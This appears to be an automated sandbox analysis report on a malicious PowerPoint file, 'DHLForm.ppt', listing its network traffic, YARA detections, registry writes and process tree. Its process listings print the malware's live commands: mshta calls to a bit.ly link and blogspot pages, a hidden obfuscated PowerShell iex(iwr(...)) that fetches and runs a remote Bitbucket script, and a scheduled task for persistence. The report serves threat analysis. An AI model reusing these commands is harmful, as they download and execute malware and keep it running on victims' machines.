Source: global traffic HTTP traffic detected: GET /p/ayoola.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: randikhanaekminar.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: backbones1234511a.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 67.199.248.15:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.22:49174 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.22:49182 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49181 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.181.227:443 -> 192.168.2.22:49184 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.22:49188 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.22:49189 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.22:49193 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49196 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.22:49198 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.22:49200 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.22:49202 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.22:49204 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.22:49207 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49209 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.22:49210 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.22:49212 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.22:49215 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.22:49217 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.22:49213 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.22:49219 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49220 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.22:49221 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.22:49222 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.22:49224 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.22:49228 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49229 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.22:49230 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.22:49231 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.22:49233 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49235 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.22:49236 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49237 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.22:49238 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Installs a global mouse hook
Source: C:\Windows\System32\mshta.exe Windows user hook set: 0 mouse low level C:\Windows\system32\dinput8.dll Jump to behavior
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\System32\mshta.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\System32\mshta.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\System32\mshta.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\System32\mshta.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\System32\mshta.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\System32\mshta.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\System32\mshta.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\System32\mshta.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\System32\mshta.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\System32\mshta.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Yara signature match
Source: 00000005.00000003.577057515.0000000002CEA000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000010.00000003.494692192.0000000000517000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.618450972.0000000002CED000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000002.637469567.0000000002CF2000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000010.00000003.493393628.0000000000504000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.613356875.00000000002AE000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000010.00000003.493106967.0000000000504000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000010.00000003.489697963.00000000004F8000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000010.00000003.457601106.00000000053D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.612051530.00000000002AE000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000010.00000003.458796779.00000000003D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000010.00000003.457254978.00000000053C6000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.615819182.00000000002BF000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000010.00000003.458251204.00000000053C6000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000010.00000003.457282853.00000000053D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.610468639.00000000002CB000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000010.00000003.490583900.00000000053C6000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.613893422.00000000002BE000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.621032513.00000000002C7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.614815299.00000000002AF000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.618251685.0000000002D04000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000010.00000002.495565989.00000000003D4000.00000004.00000020.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000010.00000003.456283921.0000000003CEE000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000010.00000003.492784254.0000000000503000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.622745990.00000000002B3000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000010.00000003.491447556.00000000004F8000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000003.609595404.00000000002AE000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000010.00000003.492409732.0000000000503000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000002.624938360.00000000002CA000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000010.00000003.490989332.00000000003D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000010.00000002.509614222.00000000053C7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000010.00000003.492068716.000000000631B000.00000004.00000040.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Detected potential crypto function
Source: C:\Windows\System32\mshta.exe Code function: 5_3_03EE20A2 5_3_03EE20A2
Source: C:\Windows\System32\mshta.exe Code function: 5_3_03EE20A2 5_3_03EE20A2
Source: C:\Windows\System32\mshta.exe Code function: 5_3_03EE20A2 5_3_03EE20A2
Source: C:\Windows\System32\mshta.exe Code function: 5_3_03EE20A2 5_3_03EE20A2
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: DHLForm.ppt OLE, VBA macro line: Sub auto_open()
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: DHLForm.ppt OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Document contains embedded VBA macros
Source: DHLForm.ppt OLE indicator, VBA macros: true
Source: DHLForm.ppt Virustotal: Detection: 8%
Source: DHLForm.ppt ReversingLabs: Detection: 22%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K..............4....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................b.^w......................_.............}..v....8.......0............................................... Jump to behavior
Source: C:\Windows\System32\schtasks.exe Console Write: ................l.................................6.............................................p.'.......................................'..... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K..............4....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................#Nw.....>..............................}..v....x?......0...............................D............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K..............4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................U/vw.....<..............................}..v.....=......0...............H.'.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..................................X.....................................`I.........v.....................K..............4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................+.Zw.....4................!.............}..v.....4......0.L.............H...............................
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\DHLForm.ppt'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\DHLForm.ppt'
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process created: C:\Windows\System32\mshta.exe MsHta https://bitly.com/yuiwqhdsavbdjagh
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''SECOTAKSA'' /F /tr ''\''MsHtA''\''http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html\''
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {7AAD1C06-2C28-4471-AEA2-E790653CFBF1} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\MsHtA.EXE 'http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\MsHTa.exe' http://1230948%1230948@backbones1234511a.blogspot.com/p/ayoolaback.html'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\MsHTa.exe' https://startthepartyup.blogspot.com/p/backbone16.html'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\MsHTa.exe' http://1230948%1230948@ghostbackbone123.blogspot.com/p/ghostbackup15.html'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\MsHTa.exe' http://1230948%1230948@backbones1234511a.blogspot.com/p/ayoolaback.html'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\MsHTa.exe' https://startthepartyup.blogspot.com/p/backbone16.html'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\MsHTa.exe' http://1230948%1230948@ghostbackbone123.blogspot.com/p/ghostbackup15.html'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\DHLForm.ppt' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process created: C:\Windows\System32\mshta.exe MsHta https://bitly.com/yuiwqhdsavbdjagh Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB); Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''SECOTAKSA'' /F /tr ''\''MsHtA''\''http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html\'' Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\MsHtA.EXE 'http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html' Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB); Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File created: C:\Users\user\Application Data\Microsoft\Forms Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File created: C:\Users\user\AppData\Local\Temp\CVRDE2E.tmp Jump to behavior
Source: classification engine Classification label: mal80.expl.evad.winPPT@24/102@30/9
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File read: C:\Users\desktop.ini Jump to behavior
